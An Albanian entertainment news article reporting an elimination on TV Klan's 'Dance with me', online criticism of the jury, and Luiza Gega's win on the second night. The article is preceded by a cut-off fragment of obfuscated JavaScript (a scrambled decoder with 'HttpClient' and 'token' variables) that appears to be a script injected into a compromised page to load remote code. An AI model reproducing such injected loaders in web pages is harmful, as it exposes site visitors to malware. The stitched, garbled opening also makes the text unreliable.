;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Eliminimi në ‘Dance with me’ shkakton debate në rrjet

By

‘Dance with me’ në spektaklin e dytë përpos fitues të mbrëmjës, pati edhe të eliminuar.

Ishte ish-Missi Arbnora Ademaj që u eliminua, pasi mbeti në trio me dy konkurentë të tjerë, Valon Shehun dhe Igli Zarkën.

 

View this post on Instagram

 

A post shared by TV KLAN (@rtvklan)

Por, ky vendim i jurisë duket të ketë shkaktuar debat në rrjet.

Komentuesit në faqen zyrtare të emisionit kanë qenë të ndarë në mendime.

Një pjesë e madhe e tyre, e kanë konsideruar vendimin për largimin e Arbnores si të padrejtë, duke shigjetuar për këtë, kryetarin e jurisë, Ilir Shaqiri.

‘Shyqyr që shpetoi Dancing with the Stars [programi konkurent] prej një njeriu si puna e Ilirit. E pamë shumë mirë që Arbnora kërceu më mirë nga të tre edhe ndonjë tjetër që duhet të ishte në sfidë por ju si produksion e keni treguar edhe më parë që kurrë nuk merrni vendimet që duhen”, shprehet një prej komentuesve.

Dikush tjetër e ka konsideruar si turp vendimin ndërsa një prej komentuesve është shprehur i pakënaqur me sjelljen siç cilësohet “arrogante” të anëtares së jurisë, Klaudia Pepa.

Ndryshe, kampionja europiane në atletikë, Luiza Gega u shpall fituese e mbrëmjes së dytë. /Prive.al

 

View this post on Instagram

 

A post shared by TV KLAN (@rtvklan)

Artikuj të ngjashëm